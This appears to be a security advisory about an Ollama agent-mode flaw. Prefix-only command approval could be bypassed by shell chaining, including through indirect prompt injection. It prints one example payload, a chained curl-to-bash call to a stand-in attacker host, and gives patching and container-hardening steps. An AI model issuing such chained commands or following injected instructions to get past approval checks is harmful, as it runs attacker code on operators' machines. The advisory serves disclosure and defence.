The development team behind Ollama, the popular open-source platform for serving large language models locally, has released version 0.31.2 to remediate a dangerous security vulnerability cataloged as CVE-2026-102697. The flaw resides in Ollama's experimental agent execution mode, where command-line approval safeguards could be completely bypassed via shell command chaining, allowing an unprompted model or an indirect prompt injection exploit to run arbitrary shell commands with the privileges of the Ollama process.

Vulnerability Mechanics: Prefix Approval vs. Shell Metacharacter Chaining

In experimental agent mode, Ollama allows models to propose terminal commands. To protect users from untrusted model autonomy, the runtime prompts the user for confirmation or checks the proposed command against an allowlist of permitted safe prefixes (such as git status or cat README.md).

Under CVE-2026-102697, the validation engine evaluated only the prefix of the command string without sanitizing shell separator tokens. An attacker supplying a prompt (or an indirect prompt injection contained within a retrieved document) could persuade the model to issue commands like:

cat README.md ; curl -s http://attacker.com/rev.sh | bash

The validation routine approved the command because the leading token matched the permitted safe utility. However, when passed to the underlying shell interpreter via exec, the shell evaluated both expressions, silently executing the secondary payload on the operator's workstation.

The Rising Threat of Agentic Supply Chain and Tool-Calling Injection

This vulnerability represents a classic example of OWASP Top 10 for LLMs — LLM07: System Prompt & Tool Execution Insecurity. Because developers increasingly connect local LLMs to system shells, file systems, and internal corporate repositories, command injection vulnerabilities in the agent orchestration glue create critical initial access vectors.

Hardening Recommendations & Version Update

Security teams and software developers utilizing Ollama must take immediate remediation steps:

  • Update Ollama: Upgrade immediately to version 0.31.2 or newer:
    curl -fsSL https://ollama.com/install.sh | sh
  • Disable Experimental Agent Features: If deploying Ollama in multi-user enterprise environments or shared GPU clusters, ensure experimental agent flags remain disabled.
  • Container Isolation: Always run Ollama inside a restricted Docker or Podman container with a non-root user and rootless runtime to prevent host file compromise:
    docker run -d --user 1000:1000 --cap-drop=ALL -v ollama:/root/.ollama -p 11434:11434 ollama/ollama:0.31.2